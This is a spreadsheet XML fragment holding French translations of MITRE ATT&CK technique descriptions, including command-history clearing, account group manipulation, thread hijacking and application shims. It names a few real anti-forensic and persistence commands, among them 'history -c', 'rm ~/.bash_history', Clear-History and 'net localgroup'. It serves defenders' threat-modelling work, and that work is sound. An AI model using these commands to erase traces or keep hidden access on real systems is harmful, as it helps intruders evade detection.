    <t>En plus d’effacer les journaux système, un adversaire peut effacer l’historique des commandes d’un compte compromis pour dissimuler les actions entreprises lors d’une intrusion. Divers interpréteurs de commandes gardent une trace des commandes que les utilisateurs saisissent dans leur terminal afin que les utilisateurs puissent retracer ce qu’ils ont fait.
Sous Linux et macOS, ces historiques de commandes sont accessibles de différentes manières. Lorsque vous êtes connecté, cet historique de commandes est suivi dans un fichier pointé par la variable &lt;code&gt;d’environnement HISTFILE.&lt;/code&gt; Lorsqu’un utilisateur se déconnecte d’un système, ces informations sont vidées dans un fichier appelé &lt;code&gt;~/.bash_history&lt;/code&gt; dans le répertoire personnel de l’utilisateur. L’avantage est qu’il permet aux utilisateurs de revenir aux commandes qu’ils ont déjà utilisées dans différentes sessions.
Les adversaires peuvent supprimer leurs commandes de ces journaux en effaçant manuellement l’historique (&lt;code&gt;history -c&lt;/code&gt;) ou en supprimant le fichier d’historique bash &lt;code&gt;rm ~/.bash_history&lt;/code&gt;.  
Les adversaires peuvent également exploiter une [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) sur les périphériques réseau pour effacer les données de l’historique des commandes (&lt;code&gt;effacer la journalisation&lt;/code&gt; et/ou &lt;code&gt;effacer l’historique&lt;/code&gt;). (Référence : US-CERT-TA18-106A)
Sur les hôtes Windows, PowerShell dispose de deux fournisseurs d’historique des commandes différents : l’historique intégré et l’historique des commandes géré par le module &lt;code&gt;PSReadLine&lt;/code&gt;. L’historique intégré ne suit que les commandes utilisées dans la session en cours. Cet historique de commandes n’est pas disponible pour les autres sessions et est supprimé à la fin de la session.
L’historique des commandes &lt;code&gt;PSReadLine&lt;/code&gt; suit les commandes utilisées dans toutes les sessions PowerShell et les écrit dans un fichier (&lt;code&gt;$env :APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt&lt;/code&gt; par défaut). Ce fichier d’historique est disponible pour toutes les sessions et contient tout l’historique passé, car le fichier n’est pas supprimé à la fin de la session. (Citation : Historique des commandes Microsoft PowerShell)
Les adversaires peuvent exécuter la commande PowerShell &lt;code&gt;Clear-History&lt;/code&gt; pour vider l’intégralité de l’historique des commandes d’une session PowerShell en cours. Cependant, cela ne supprimera pas/videra le fichier &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt;. Les adversaires peuvent également supprimer le fichier &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; ou modifier son contenu pour masquer les commandes PowerShell qu’ils ont exécutées. (Citation : audit de commande Sophos PowerShell)(Citation : Sophos PowerShell Command History Forensics)
https://attack.mitre.org/techniques/T1070/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des utilitaires qui permettent l’exécution de commandes pour contourner les restrictions de sécurité qui limitent l’utilisation des interpréteurs de ligne de commande. Divers utilitaires Windows peuvent être utilisés pour exécuter des commandes, éventuellement sans invoquer [cmd](https://attack.mitre.org/software/S0106). Par exemple, [Forfiles](https://attack.mitre.org/software/S0193), l’Assistant de compatibilité des programmes (pcalua.exe), les composants du sous-système Windows pour Linux (WSL), Scriptrunner.exe, ainsi que d’autres utilitaires peuvent appeler l’exécution de programmes et de commandes à partir d’un [Interpréteur de commandes et de scripts](https://attack.mitre.org/techniques/T1059), d’une fenêtre d’exécution ou via des scripts. (Citation : VectorSec ForFiles août 2017)(Citation : evi1cg forfiles novembre 2017)(Citation : Équipe sécurisée - Scriptrunner.exe)(Référence : SS64)(Citation : Ordinateur qui bipe - Scriptrunner.exe)
Les adversaires peuvent abuser de ces fonctionnalités pour [Defense Evasion](https://attack.mitre.org/tactics/TA0005), en particulier pour effectuer une exécution arbitraire tout en contournant les détections et/ou les contrôles d’atténuation (tels que la stratégie de groupe) qui limitent/empêchent l’utilisation de [cmd](https://attack.mitre.org/software/S0106) ou d’extensions de fichiers plus couramment associées à des charges utiles malveillantes.
https://attack.mitre.org/techniques/T1202</t>
  </si>
  <si>
    <t>Les adversaires peuvent s’attaquer aux systèmes, éventuellement ceux situés sur des réseaux déconnectés ou isolés, en copiant des logiciels malveillants sur des supports amovibles et en tirant parti des fonctionnalités Autorun lorsque le support est inséré dans un système et s’exécute. Dans le cas du mouvement latéral, cela peut se produire en modifiant les fichiers exécutables stockés sur des supports amovibles ou en copiant des logiciels malveillants et en les renommant pour qu’ils ressemblent à des fichiers légitimes afin d’inciter les utilisateurs à l’exécuter sur un système distinct. Dans le cas de l’accès initial, cela peut se produire par le biais d’une manipulation manuelle du support, d’une modification des systèmes utilisés pour formater initialement le support ou d’une modification du micrologiciel du support lui-même.
Les appareils mobiles peuvent également être utilisés pour infecter les PC avec des logiciels malveillants s’ils sont connectés via USB. (Citation : Exploitation de l’USB du smartphone) Cette infection peut être réalisée à l’aide d’appareils (Android, iOS, etc.) et, dans certains cas, de câbles de charge USB. (Citation : Un logiciel malveillant Windows infecte Android)(Citation : Piratage du câble de charge de l’iPhone) Par exemple, lorsqu’un smartphone est connecté à un système, il peut sembler être monté de la même manière qu’un lecteur de disque connecté par USB. Si un logiciel malveillant compatible avec le système connecté se trouve sur l’appareil mobile, le logiciel malveillant peut infecter l’ordinateur (en particulier si les fonctionnalités d’exécution automatique sont activées).
https://attack.mitre.org/techniques/T1091</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher des sources de système locales, telles que des systèmes de fichiers et des fichiers de configuration ou des bases de données locales, pour trouver des fichiers d’intérêt et des données sensibles avant l’exfiltration.
Les adversaires peuvent le faire à l’aide d’un [Interpréteur de commandes et de scripts](https://attack.mitre.org/techniques/T1059), tel que [cmd](https://attack.mitre.org/software/S0106) ainsi que d’une [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), qui ont la fonctionnalité d’interagir avec le système de fichiers pour collecter des informations. (Référence : show_run_config_cmd_cisco) Les adversaires peuvent également utiliser [Collecte automatisée](https://attack.mitre.org/techniques/T1119) sur le système local.
https://attack.mitre.org/techniques/T1005</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser [Fichiers ou informations obfusqués](https://attack.mitre.org/techniques/T1027) pour masquer les artefacts d’une intrusion à l’analyse. Ils peuvent avoir besoin de mécanismes distincts pour décoder ou débrouiller ces informations en fonction de la façon dont ils ont l’intention de les utiliser. Les méthodes pour ce faire incluent la fonctionnalité intégrée des logiciels malveillants ou l’utilisation d’utilitaires présents sur le système.
Un tel exemple est l’utilisation de [certutil](https://attack.mitre.org/software/S0160) pour décoder un fichier exécutable portable d’outil d’accès à distance qui a été caché dans un fichier de certificat. (Citation : Attaque ciblée de Malwarebytes contre l’Arabie saoudite) Un autre exemple est l’utilisation de la commande Windows &lt;code&gt;copy /b&lt;/code&gt; pour réassembler des fragments binaires en une charge utile malveillante. (Citation : Obfuscation du noir de carbone septembre 2016)
Parfois, l’action d’un utilisateur peut être nécessaire pour l’ouvrir à des fins de désobfuscation ou de déchiffrement dans le cadre de [Exécution par l’utilisateur](https://attack.mitre.org/techniques/T1204). L’utilisateur peut également être tenu de saisir un mot de passe pour ouvrir un fichier compressé/chiffré protégé par un mot de passe qui a été fourni par l’adversaire. (Citation : Volexity PowerDuke, novembre 2016)
https://attack.mitre.org/techniques/T1140</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des règles de Microsoft Outlook pour obtenir la persistance sur un système compromis. Les règles Outlook permettent à un utilisateur de définir un comportement automatisé pour gérer les messages électroniques. Une règle bénigne peut, par exemple, déplacer automatiquement un e-mail vers un dossier particulier dans Outlook s’il contient des mots spécifiques provenant d’un expéditeur spécifique. Des règles Outlook malveillantes peuvent être créées et déclencher l’exécution de code lorsqu’un adversaire envoie un e-mail spécialement conçu à cet utilisateur. (Citation : Règles SilentBreak Outlook)
Une fois que des règles malveillantes ont été ajoutées à la boîte aux lettres de l’utilisateur, elles sont chargées au démarrage d’Outlook. Des règles malveillantes s’exécutent lorsqu’un adversaire envoie un e-mail spécialement conçu à l’utilisateur. (Citation : Règles SilentBreak Outlook)
https://attack.mitre.org/techniques/T1137/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier de manière malveillante des composants de l’environnement d’une victime afin d’entraver ou de désactiver les mécanismes défensifs. Cela implique non seulement d’altérer les défenses préventives, telles que les pare-feu et les antivirus, mais aussi les capacités de détection que les défenseurs peuvent utiliser pour auditer l’activité et identifier les comportements malveillants. Cela peut également couvrir à la fois les défenses natives et les fonctionnalités supplémentaires installées par les utilisateurs et les administrateurs.
Les adversaires peuvent également entraver les opérations de routine qui contribuent à l’hygiène défensive, telles que le blocage de la déconnexion des utilisateurs, l’arrêt d’un système ou la désactivation ou la modification du processus de mise à jour. Les adversaires peuvent également cibler les mécanismes d’agrégation et d’analyse d’événements, ou perturber ces procédures en modifiant d’autres composants du système. Ces restrictions peuvent permettre des opérations malveillantes ainsi que la propagation continue d’incidents. (Référence : Google Cloud Mandiant UNC3886 2024)(Citation : arrêt d’Emotet)
https://attack.mitre.org/techniques/T1562</t>
  </si>
  <si>
    <t>Les adversaires peuvent compromettre les comptes cloud qui peuvent être utilisés lors du ciblage. Les adversaires peuvent utiliser des comptes cloud compromis pour poursuivre leurs opérations, notamment en exploitant des services de stockage cloud tels que Dropbox, Microsoft OneDrive ou des compartiments AWS S3 pour [Exfiltration vers le stockage cloud](https://attack.mitre.org/techniques/T1567/002) ou vers [Outil de chargement](https://attack.mitre.org/techniques/T1608/002). Les comptes cloud peuvent également être utilisés dans l’acquisition d’infrastructures, telles que l’infrastructure [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003) ou l’infrastructure [Serverless](https://attack.mitre.org/techniques/T1583/007). De plus, les services de messagerie basés sur le cloud, tels que Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service) ou AWS SES (Simple Email Service) peuvent être utilisés pour le spam ou le [hameçonnage](https://attack.mitre.org/techniques/T1566). (Citation : Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation : Netcraft SendGrid 2024) La compromission des comptes cloud peut permettre aux adversaires de développer des fonctionnalités sophistiquées sans gérer leurs propres serveurs. (Citation : Awake Security C2 Cloud)
Il existe diverses méthodes pour compromettre les comptes cloud, telles que la collecte d’informations d’identification via [Phishing for Information](https://attack.mitre.org/techniques/T1598), l’achat d’informations d’identification sur des sites tiers, la réalisation d’attaques [Password Spraying](https://attack.mitre.org/techniques/T1110/003) ou la tentative de [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation : MSTIC Nobelium Oct 2021) Avant de compromettre les comptes cloud, les adversaires peuvent effectuer des opérations Reconnaissance pour éclairer les décisions sur les comptes à compromettre pour poursuivre leur opération. Dans certains cas, les adversaires peuvent cibler des comptes de fournisseurs de services privilégiés dans le but de tirer parti d’une [relation de confiance](https://attack.mitre.org/techniques/T1199) entre les fournisseurs de services et leurs clients. (Citation : MSTIC Nobelium octobre 2021)
https://attack.mitre.org/techniques/T1586/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent compromettre les comptes de messagerie qui peuvent être utilisés lors du ciblage. Les adversaires peuvent utiliser des comptes de messagerie compromis pour poursuivre leurs opérations, par exemple en les exploitant pour mener des campagnes de [phishing pour information](https://attack.mitre.org/techniques/T1598), [de phishing](https://attack.mitre.org/techniques/T1566) ou de spam à grande échelle. L’utilisation d’un personnage existant avec un compte de messagerie compromis peut engendrer un certain niveau de confiance chez une victime potentielle si elle a une relation avec le personnage compromis ou si elle le connaît. Les comptes de messagerie compromis peuvent également être utilisés dans l’acquisition d’infrastructures (ex : [Domaines](https://attack.mitre.org/techniques/T1583/001)).
Il existe diverses méthodes pour compromettre les comptes de messagerie, telles que la collecte d’identifiants via [Phishing for Information](https://attack.mitre.org/techniques/T1598), l’achat d’identifiants sur des sites tiers, le filtrage par force brute d’identifiants (par exemple, la réutilisation de mots de passe à partir de vidages d’identifiants de violation) ou le paiement d’employés, de fournisseurs ou de partenaires commerciaux pour l’accès aux identifiants. (Citation : AnonHBGary)(Référence : Microsoft DEV-0537) Avant de compromettre les comptes de messagerie, les adversaires peuvent effectuer une reconnaissance pour éclairer les décisions sur les comptes à compromettre afin de poursuivre leurs opérations. Les adversaires peuvent cibler des comptes de messagerie ou des domaines bien connus compromettants à partir desquels des spams malveillants ou des e-mails [https://attack.mitre.org/techniques/T1566 de phishing peuvent contourner les règles de filtrage des e-mails basées sur la réputation.
Les adversaires peuvent utiliser un compte de messagerie compromis pour détourner des fils d’e-mails existants avec des cibles d’intérêt.
https://attack.mitre.org/techniques/T1586/002</t>
  </si>
  <si>
    <t>Un adversaire peut ajouter des groupes locaux ou de domaine supplémentaires à un compte contrôlé par l’adversaire afin de maintenir un accès persistant à un système ou à un domaine.
Sous Windows, les comptes peuvent utiliser les commandes 'net localgroup' et 'net group' pour ajouter des utilisateurs existants à des groupes locaux et de domaine. (Citation : Microsoft Net Localgroup)(Citation : Microsoft Net Group) Sous Linux, les adversaires peuvent utiliser la commande 'usermod' dans le même but. (Citation : Linux Usermod)
Par exemple, des comptes peuvent être ajoutés au groupe d’administrateurs locaux sur les appareils Windows pour conserver des privilèges élevés. Ils peuvent également être ajoutés au groupe Utilisateurs Bureau à distance, ce qui leur permet d’utiliser [Protocole Bureau à distance](https://attack.mitre.org/techniques/T1021/001) pour se connecter aux points de terminaison à l’avenir. (Citation : Connexions RDP Microsoft) Sous Linux, des comptes peuvent être ajoutés au groupe sudoers, ce qui leur permet d’exploiter de manière persistante [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003) pour obtenir des privilèges élevés. 
Dans les environnements Windows, les comptes d’ordinateur peuvent également être ajoutés aux groupes de domaines. Cela permet au compte SYSTEM local d’obtenir des privilèges sur le domaine. (Citation : Détection RootDSE AD 2022)
https://attack.mitre.org/techniques/T1098/007</t>
  </si>
  <si>
    <t>Les adversaires peuvent télécharger des logiciels malveillants sur une infrastructure tierce ou contrôlée par l’adversaire pour les rendre accessibles pendant le ciblage. Les logiciels malveillants peuvent inclure des charges utiles, des droppers, des outils de post-compromission, des portes dérobées et divers autres contenus malveillants. Les adversaires peuvent télécharger des logiciels malveillants pour soutenir leurs opérations, par exemple en mettant une charge utile à la disposition d’un réseau victime pour permettre le [transfert d’outil d’entrée](https://attack.mitre.org/techniques/T1105) en la plaçant sur un serveur Web accessible sur Internet.
Les logiciels malveillants peuvent être placés sur une infrastructure qui a déjà été achetée/louée par l’adversaire ([Acquérir l’infrastructure](https://attack.mitre.org/techniques/T1583)) ou qui a été compromise par celui-ci ([Compromettre l’infrastructure](https://attack.mitre.org/techniques/T1584)). Les logiciels malveillants peuvent également être hébergés sur des services Web, tels que GitHub ou Pastebin, ou sur l’InterPlanetary File System (IPFS), où le stockage de contenu décentralisé rend difficile la suppression des fichiers malveillants. (Citation : Volexity Ocean Lotus novembre 2020)(Référence : Talos IPFS 2022)
Les adversaires peuvent télécharger des fichiers dérobés, tels que des fichiers binaires d’application, des images de machine virtuelle ou des images de conteneur, vers des magasins de logiciels ou des référentiels tiers (par exemple : GitHub, CNET, AWS Community AMI, Docker Hub). Par hasard, les victimes peuvent télécharger/installer directement ces fichiers dérobés via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquage](https://attack.mitre.org/techniques/T1036) peut augmenter le risque que les utilisateurs exécutent ces fichiers par erreur.
https://attack.mitre.org/techniques/T1608/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent manipuler les produits ou les mécanismes de livraison des produits avant leur réception par un consommateur final dans le but de compromettre les données ou le système.
La compromission de la chaîne d’approvisionnement peut avoir lieu à n’importe quelle étape de la chaîne d’approvisionnement, y compris :
* Manipulation des outils de développement
* Manipulation d’un environnement de développement
* Manipulation de dépôts de code source (publics ou privés)
* Manipulation du code source dans les dépendances open-source
* Manipulation des mécanismes de mise à jour/distribution de logiciels
* Images système compromises/infectées (plusieurs cas de supports amovibles infectés en usine) (Citation : IBM Storwize) (Citation : Schneider Electric USB Malware) 
* Remplacement des logiciels légitimes par des versions modifiées
* Vente de produits modifiés/contrefaits à des distributeurs légitimes
* Interdiction d’expédition
Bien que la compromission de la chaîne d’approvisionnement puisse avoir un impact sur n’importe quel composant du matériel ou des logiciels, les adversaires qui cherchent à obtenir une exécution se sont souvent concentrés sur les ajouts malveillants à des logiciels légitimes dans les canaux de distribution ou de mise à jour de logiciels. (Citation : Avast CCleaner3 2018)(Citation : Microsoft Dofoil 2018)(Référence : Command Five SK 2011) Le ciblage peut être spécifique à un ensemble de victimes souhaitées ou les logiciels malveillants peuvent être distribués à un large éventail de consommateurs, mais ne passer qu’à des tactiques supplémentaires sur des victimes spécifiques. (Référence : Symantec Elderwood, septembre 2012)(Citation : Avast CCleaner3 2018)(Référence : Command Five SK 2011) Les projets open source populaires qui sont utilisés comme dépendances dans de nombreuses applications peuvent également être ciblés comme moyen d’ajouter du code malveillant aux utilisateurs de la dépendance. (Citation : Compromis NPM de Trendmicro)
https://attack.mitre.org/techniques/T1195</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’exploiter une faiblesse d’un hôte ou d’un système connecté à Internet pour accéder initialement à un réseau. La faiblesse du système peut être un bogue logiciel, un problème temporaire ou une mauvaise configuration.
Les applications exploitées sont souvent des sites Web/serveurs Web, mais peuvent également inclure des bases de données (comme SQL), des services standard (comme SMB ou SSH), des protocoles d’administration et de gestion des périphériques réseau (comme SNMP et Smart Install) et tout autre système avec des sockets ouverts accessibles sur Internet. (Référence : NVD CVE-2016-6662)(Citation : Vulnérabilités multiples des PME de la CIS)(Référence : US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation : Blog Cisco Legacy Device Attacks)(Référence : NVD CVE-2014-7169) En fonction de la faille exploitée, il peut également s’agir d’une [Exploitation pour l’évasion de la défense](https://attack.mitre.org/techniques/T1211) ou d’une [Exploitation pour l’exécution du client](https://attack.mitre.org/techniques/T1203).
Si une application est hébergée sur une infrastructure basée sur le cloud et/ou est conteneurisée, son exploitation peut entraîner la compromission de l’instance ou du conteneur sous-jacent. Cela peut permettre à un adversaire d’accéder aux API de cloud ou de conteneur (par exemple, via l’API de métadonnées d’instance cloud](https://attack.mitre.org/techniques/T1552/005)), d’exploiter l’accès à l’hôte de conteneur via [Escape to Host](https://attack.mitre.org/techniques/T1611) ou de tirer parti de politiques de gestion des identités et des accès faibles.
Les adversaires peuvent également exploiter l’infrastructure du réseau de périphérie et les appliances associées, en ciblant spécifiquement les appareils qui ne prennent pas en charge des défenses robustes basées sur l’hôte. (Citation : Mandiant Fortinet Zero Day)(Citation : Cyberguerre câblée de la Russie)
Pour les sites Web et les bases de données, le top 10 de l’OWASP et le top 25 du CWE mettent en évidence les vulnérabilités Web les plus courantes. (Citation : OWASP Top 10)(Citation : CWE top 25)
https://attack.mitre.org/techniques/T1190</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de contourner l’authentification Kerberos en volant ou en falsifiant des tickets Kerberos pour activer [Transmettre le ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos est un protocole d’authentification largement utilisé dans les environnements de domaine Windows modernes. Dans les environnements Kerberos, appelés « domaines », il y a trois participants de base : le client, le service et le centre de distribution de clés (KDC). (Citation : Décodeur en anneau Kerberos ADSecurity) Les clients demandent l’accès à un service et, grâce à l’échange de tickets Kerberos, provenant de KDC, ils se voient accorder l’accès après s’être authentifiés avec succès. Le KDC est responsable à la fois de l’authentification et de l’attribution des billets.  Les adversaires peuvent tenter d’abuser de Kerberos en volant des billets ou en falsifiant des billets pour permettre un accès non autorisé.
Sous Windows, l’utilitaire &lt;code&gt;klist&lt;/code&gt; intégré peut être utilisé pour répertorier et analyser les tickets Kerberos mis en cache. (Citation : Microsoft Klist)
https://attack.mitre.org/techniques/T1558</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher des emplacements de stockage de mots de passe courants pour obtenir les informations d’identification de l’utilisateur. (Citation : F-Secure The Dukes) Les mots de passe sont stockés à plusieurs endroits sur un système, en fonction du système d’exploitation ou de l’application contenant les informations d’identification. Il existe également des applications et des services spécifiques qui stockent les mots de passe pour faciliter leur gestion et leur maintenance, tels que les gestionnaires de mots de passe et les coffres-forts de secrets dans le cloud. Une fois les informations d’identification obtenues, elles peuvent être utilisées pour effectuer des mouvements latéraux et accéder à des informations restreintes.
https://attack.mitre.org/techniques/T1555</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser un service Web externe légitime existant pour exfiltrer des données plutôt que leur canal de commande et de contrôle principal. Les services Web populaires agissant comme un mécanisme d’exfiltration peuvent offrir une couverture importante en raison de la probabilité que les hôtes d’un réseau communiquent déjà avec eux avant la compromission. Des règles de pare-feu peuvent également déjà exister pour autoriser le trafic vers ces services.
Les fournisseurs de services Web utilisent également couramment le cryptage SSL/TLS, ce qui offre aux adversaires un niveau de protection supplémentaire.
https://attack.mitre.org/techniques/T1567</t>
  </si>
  <si>
    <t>Un adversaire peut utiliser un logiciel de support de bureau et d’accès à distance légitime pour établir un canal de commande et de contrôle interactif afin de cibler les systèmes au sein des réseaux. Ces services, tels que « VNC », « Team Viewer », « AnyDesk », « ScreenConnect », « LogMein », « AmmyyAdmin » et d’autres outils de surveillance et de gestion à distance (RMM), sont couramment utilisés en tant que logiciels de support technique légitimes et peuvent être autorisés par le contrôle des applications dans un environnement cible. (Citation : Symantec vivant de la terre)(Citation : Rapport sur les menaces mondiales 2015 de CrowdStrike)(Citation : CrySyS Blog TeamSpy)
Un logiciel d’accès à distance peut être installé et utilisé après la compromission comme canal de communication alternatif pour un accès redondant ou comme moyen d’établir une session de bureau à distance interactive avec le système cible. Ils peuvent également être utilisés comme composant d’un logiciel malveillant pour établir une connexion inverse ou une rétroconnexion à un service ou à un système contrôlé par l’adversaire.
De la même manière, les adversaires peuvent abuser des fonctionnalités de réponse incluses dans l’EDR et d’autres outils défensifs qui permettent un accès à distance.
L’installation de nombreux logiciels d’accès à distance peut également inclure la persistance (par exemple, la routine d’installation du logiciel crée un [service Windows](https://attack.mitre.org/techniques/T1543/003)). Des modules/fonctionnalités d’accès à distance peuvent également exister dans le cadre de logiciels existants (par exemple, le bureau à distance de Google Chrome). (Citation : Bureau à distance Google Chrome)(Citation : Bureau à distance Chrome)
https://attack.mitre.org/techniques/T1219</t>
  </si>
  <si>
    <t>Les adversaires peuvent acquérir des domaines qui peuvent être utilisés lors du ciblage. Les noms de domaine sont les noms lisibles par l’homme utilisés pour représenter une ou plusieurs adresses IP. Ils peuvent être achetés ou, dans certains cas, acquis gratuitement.
Les adversaires peuvent utiliser les domaines acquis à diverses fins, notamment pour le [phishing](https://attack.mitre.org/techniques/T1566), la [compromission intempestive](https://attack.mitre.org/techniques/T1189) et le contrôle et la commande. (Citation : CISA MSS septembre 2020) Les adversaires peuvent choisir des domaines similaires à des domaines légitimes, notamment en utilisant des homoglyphes ou en utilisant un domaine de premier niveau (TLD) différent. (Référence : FireEye APT28)(Citation : PaypalScam) Le typosquatting peut être utilisé pour faciliter la livraison de charges utiles via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Les adversaires peuvent également utiliser des noms de domaine internationalisés (IDN) et des jeux de caractères différents (par exemple, cyrillique, grec, etc.) pour exécuter des « attaques homographes IDN », créant ainsi des domaines visuellement similaires utilisés pour diffuser des logiciels malveillants aux machines victimes. (Référence : CISA IDN ST05-016)(Référence : tt_httrack_fake_domains)(Référence : tt_obliqueRAT)(Référence : httrack_unhcr)(Référence : lazgroup_idn_phishing)
Différentes URI/URL peuvent également être générées dynamiquement pour diffuser de manière unique du contenu malveillant aux victimes (y compris des noms de domaine à usage unique et uniques). (Citation : Schéma d’URL iOS)(Citation : URI)(citation : utilisation de l’URI)(citation : URI unique)
Les adversaires peuvent également acquérir et réaffecter des domaines expirés, qui peuvent être déjà autorisés ou approuvés par les défenseurs sur la base d’une réputation ou d’un historique existant. (Référence : Categorisation_not_boundary)(Référence : Domain_Steal_CC)(Référence : Redirectors_Domain_Fronting)(Référence : bypass_webproxy_filtering)
Les bureaux d’enregistrement de domaines gèrent chacun une base de données accessible au public qui affiche les informations de contact de chaque domaine enregistré. Les services WHOIS privés affichent des informations alternatives, telles que leurs propres données d’entreprise, plutôt que le propriétaire du domaine. Les adversaires peuvent utiliser ces services WHOIS privés pour masquer des informations sur le propriétaire d’un domaine acheté. Les adversaires peuvent interrompre les efforts de suivi de leur infrastructure en utilisant des informations d’enregistrement variées et en achetant des domaines auprès de différents bureaux d’enregistrement de domaines. (Référence : Mandiant APT1)
En plus d’acheter légitimement un domaine, un adversaire peut enregistrer un nouveau domaine dans un environnement compromis. Par exemple, dans les environnements AWS, les adversaires peuvent tirer parti du service de domaine Route53 pour enregistrer un domaine et créer des zones hébergées pointant vers des ressources choisies par l’acteur malveillant. (Citation : Invictus IR DangerDev 2024)
https://attack.mitre.org/techniques/T1583/001</t>
  </si>
  <si>
    <t>Un adversaire peut compresser ou chiffrer les données collectées avant l’exfiltration à l’aide de bibliothèques tierces. Il existe de nombreuses bibliothèques qui peuvent archiver des données, notamment [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation : PyPI RAR), libzip (Citation : libzip) et zlib (Citation : Zlib Github). La plupart des bibliothèques incluent des fonctionnalités permettant de chiffrer et/ou de compresser des données.
Certaines bibliothèques d’archives sont préinstallées sur les systèmes, telles que bzip2 sur macOS et Linux, et zip sur Windows. Notez que les bibliothèques sont différentes des utilitaires. Les bibliothèques peuvent être liées lors de la compilation, tandis que les utilitaires nécessitent la création d’un sous-shell ou d’un mécanisme d’exécution similaire.
https://attack.mitre.org/techniques/T1560/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent injecter du code malveillant dans les processus piratés afin d’échapper aux défenses basées sur les processus et éventuellement d’élever les privilèges. Le détournement d’exécution de thread est une méthode d’exécution de code arbitraire dans l’espace d’adressage d’un processus en direct distinct. 
Le détournement de threads est généralement effectué en suspendant un processus existant, puis en démappant/vidant sa mémoire, qui peut ensuite être remplacée par un code malveillant ou le chemin d’accès à une DLL. Un handle vers un processus victime existant est d’abord créé à l’aide d’appels d’API Windows natifs tels &lt;code&gt;qu’OpenThread&lt;/code&gt;. À ce stade, le processus peut être suspendu, puis écrit, réaligné sur le code injecté et repris via &lt;code&gt;SuspendThread&lt;/code&gt;, &lt;code&gt;VirtualAllocEx&lt;/code&gt;, &lt;code&gt;WriteProcessMemory&lt;/code&gt;, &lt;code&gt;SetThreadContext&lt;/code&gt;, puis &lt;code&gt;ResumeThread&lt;/code&gt; respectivement. (Citation : Injection de processus élastique juillet 2017)
Ceci est très similaire à [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), mais cible un processus existant plutôt que de créer un processus dans un état suspendu.  
L’exécution de code dans le contexte d’un autre processus peut permettre d’accéder à la mémoire du processus, aux ressources système/réseau et éventuellement à des privilèges élevés. Le détournement d’exécution peut également échapper à la détection des produits de sécurité, car l’exécution est masquée par un processus légitime.
https://attack.mitre.org/techniques/T1055/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de manipuler les caractéristiques de leurs artefacts pour les faire paraître légitimes ou bénins aux utilisateurs et/ou aux outils de sécurité. Le masquage se produit lorsque le nom ou l’emplacement d’un objet, légitime ou malveillant, est manipulé ou abusé dans le but d’échapper aux défenses et à l’observation. Il peut s’agir de manipuler les métadonnées des fichiers, d’inciter les utilisateurs à mal identifier le type de fichier et de donner des noms de tâches ou de services légitimes.
Renommer des utilitaires système abusifs pour échapper à la surveillance de sécurité est également une forme de [Masquerading](https://attack.mitre.org/techniques/T1036). (Citation : Site principal de LOLBAS)
https://attack.mitre.org/techniques/T1036</t>
  </si>
  <si>
    <t>Les adversaires peuvent établir une persistance et/ou élever des privilèges en exécutant du contenu malveillant déclenché par des shims d’application. L’infrastructure/cadre de compatibilité des applications Microsoft Windows (Application Shim) a été créé pour permettre la rétrocompatibilité des logiciels à mesure que la base de code du système d’exploitation change au fil du temps. Par exemple, la fonctionnalité de shimming d’application permet aux développeurs d’appliquer des correctifs aux applications (sans réécrire le code) qui ont été créées pour Windows XP afin qu’elles fonctionnent avec Windows 10. (Citation : Injection de processus élastique juillet 2017)
Dans le cadre, les shims sont créés pour agir comme un tampon entre le programme (ou plus précisément, la table d’adresses d’importation) et le système d’exploitation Windows. Lorsqu’un programme est exécuté, le cache shim est référencé pour déterminer si le programme nécessite l’utilisation de la base de données shim (.sdb). Si c’est le cas, la base de données shim utilise l’accrochage pour rediriger le code si nécessaire afin de communiquer avec le système d’exploitation. 
Une liste de tous les shims actuellement installés par l’installateur Windows par défaut (sdbinst.exe) est conservée dans :
* &lt;code&gt;%WINDIR %\AppPatch\sysmain.sdb&lt;/code&gt; et
* &lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb&lt;/code&gt;
Les bases de données personnalisées sont stockées dans :
* &lt;code&gt;%WINDIR %\AppPatch\custom &amp; %WINDIR %\AppPatch\AppPatch64\Custom&lt;/code&gt; et
* &lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom&lt;/code&gt;
Pour assurer la sécurité des shim, Windows les a conçus pour qu’ils s’exécutent en mode utilisateur afin qu’ils ne puissent pas modifier le noyau et que vous disposiez de privilèges d’administrateur pour installer un shim. Toutefois, certains shims peuvent être utilisés pour [Contourner le contrôle de compte d’utilisateur](https://attack.mitre.org/techniques/T1548/002) (UAC et RedirectEXE), injecter des DLL dans les processus (InjectDLL), désactiver la prévention de l’exécution des données (DisableNX) et la gestion des exceptions de structure (DisableSEH) et intercepter les adresses de mémoire (GetProcAddress).
L’utilisation de ces shims peut permettre à un adversaire d’effectuer plusieurs actes malveillants tels que l’élévation des privilèges, l’installation de portes dérobées, la désactivation de défenses telles que Windows Defender, etc. Les shims peuvent également être utilisés de manière abusive pour établir la persistance en étant continuellement invoqués par les programmes affectés.
https://attack.mitre.org/techniques/T1546/011</t>
  </si>
  <si>
